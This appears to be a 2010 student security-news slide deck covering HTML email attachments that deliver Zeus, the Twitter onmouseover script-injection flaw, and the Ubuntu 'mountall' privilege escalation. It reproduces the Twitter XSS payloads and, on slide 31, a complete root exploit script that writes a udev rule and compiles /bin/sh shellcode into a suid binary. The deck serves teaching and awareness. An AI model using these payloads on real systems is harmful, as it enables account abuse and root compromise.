資安新聞簡報

1. 資安新聞簡報 報告人：曾家雄、劉旭哲、莊承恩

2. Outline • Spammers Hit Email Users with New HTML Attack – 家雄 • Script Injection – Twitter– 旭哲 • Ubuntu Linux ‘mountall’ Local Privilege Escalation Vulnerability– 承恩

3. SPAMMERS HIT EMAIL USERS WITH NEW HTML ATTACK John E Dunn, TechWorld September 24, 2010

4. Introduction • Spammers have suddenly cranked up the use of malicious html file attachments in recent days • The latest campaign tries to get recipients to click on 'harmless' html attachments which launches an obfuscated Javascript attack that sends users to a variety of websites peddling everything from bogus CODECS to pharmacy

5. Introduction • Spam built around html is nothing new, but does seem to have become a hot technique in the last year or so with some spammers • A popular variant is the bogus 'Delivery Status Notification Failure', a sneaky way to get the attention of a user without arousing suspicion • More recently still, the spammers started embedding the Javascript inside the html file (rather than as a simple file attachment), to spread the horrible Zeus banking Trojan

6. Introduction • Users have been warned of the potential dangers associated with clicking on a file or link that arrives in an email • But many people assume that an HTML file is just a webpage and that webpages are safe • This assumption is misleading, and HTML attachments are just as serious of a threat as other attachment types

7. Introduction • Google hot topic search results frequently are littered with links to hacked sites that serve up malicious JavaScript • Now, the attackers are taking that a step further and not requiring the user to come to their hacked sites but rather simply emailing the same malicious JavaScript sites straight to an inbox

8. Google Hot Topic Search Results

9. With Messages to Match

10. HTML Don’t Seem So Harmless • The attachments include 100% obfuscated JavaScript – JavaScript deliberately made confusing to read or scan in order to make it harder for anti-virus products to identify it

11. The fake pharmacy site

12. The fake codec site

13. The fake anti-virus site

14. HTML behind the fake anti-virus site

15. What Makes a Real Problem • Although the fake anti-virus site can be defeated by simply terminating the browser, the backdoor has already quietly been installed

16. Zeus Banking Trojan

17. Zeus Banking Trojan

18. Conclusion • "So yes, a seemingly innocent HTML email attachment can do plenty of damage, and while quite stealthy, definitely not harmless," concludes Barracuda Labs' researcher, Dave Michmerhuizen

19. Reference • http://www.barracudalabs.com/wordpress/index.php/2010/09/23/html-is-not-harmless-email-security-update/ • http://www.networkworld.com/news/2010/092410-spammers-hit-email-users-with.html?hpg1=bn

20. SCRIPT INJECTION - TWITTER

21. 9/21 Attacker use an exploit to post msg • Victim’s mouse over this msg and send out automatically • But how?

22. When you want to post URL, twitter will wrap like this: • <a href=”YOUR_LINK” class=”tweet-url” rel=”nofollow” target=”_blank”> YOUR_LINK • </a>

23. If your URL like this… • http://www.ncu.edu.tw ”onmouseover=alert(‘Injection!’) • No sanitize the URL

24. Therefore, in web language… • <a href=”http://www.ncu.edu.tw ”onmouseover=alert(‘Injection!’)//” class=”tweet-url” rel=”nofollow” target=”_blank”> http://www.ncu.edu.tw //” onmouseover=alert(‘Injection!’) • </a>

25. http://a.bc/@”onmouseover=”document.getElementById(‘status’).value=’RT YourTwitterId’; • $(‘.status-update-form’).submit();” • class=”modal-overlay”/

27. http://www.ithome.com.tw/itadm/article.php?c=63493 • http://blog.trendmicro.com/twitter-mouseover-flaw-allows-script-injection/ • http://www.technewsworld.com/story/70880.html • http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html

28. UBUNTU LINUX 'MOUNTALL' LOCAL PRIVILEGE ESCALATION VULNERABILITY

29. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • mountall: filesystem mounting tool • mount filesystems once the underlying devices have been created by udevd • udev: • way of managing /dev directories (store file-like device nodes) • to create and name /dev device nodes corresponding to devices, udev relies on matching information provided by sysfs with rules provided by the user

30. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • mountall creates /dev/.udev/rules.d/root.rules as world-writable • -rw-rw-rw- 1 root root 70 2010-06-09 07:31 /dev/.udev/rules.d/root.rules • the rules allow user to run program • Local attackers can exploit this issue to execute arbitrary commands as the 'root' user • CVSS v2 Base Score:6.9

31. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • #!/bin/sh • # by fuzz. For Anux inc. # • # ubuntu 10.04 , 10.10 • if [ -z "$1" ] • then • echo "usage: $0 <UDEV KERNEL EVENT>" • echo "see here http://www.reactivated.net/writing_udev_rules.html" • exit • fi • cat > usn985-exploit.sh << EOF • #!/bin/sh • chown root:root $PWD/usn985-sc • chmod +s $PWD/usn985-sc • EOF • cat > usn985-sc.c << EOF • char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68" • "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; • main(){int *r;*((int *)&r+2)=(int)s;} • EOF • gcc usn985-sc.c -o usn985-sc • echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules • chmod +x usn985-exploit.sh • echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)" • echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"

32. /dev/.udev/rules.d/root.rules usn985-sc usn985-sc.c usn985-exploit.sh usn985-exploit.sh start.sh udevd Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability Gen. Gen. chmod Gen. Mod. Run Read Trigger Add

33. Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability • DEMO

34. Reference • http://www.exploit-db.com/exploits/15074/ • http://www.reactivated.net/writing_udev_rules.html#external-run • http://blog.chinaunix.net/u1/56723/showart_479390.html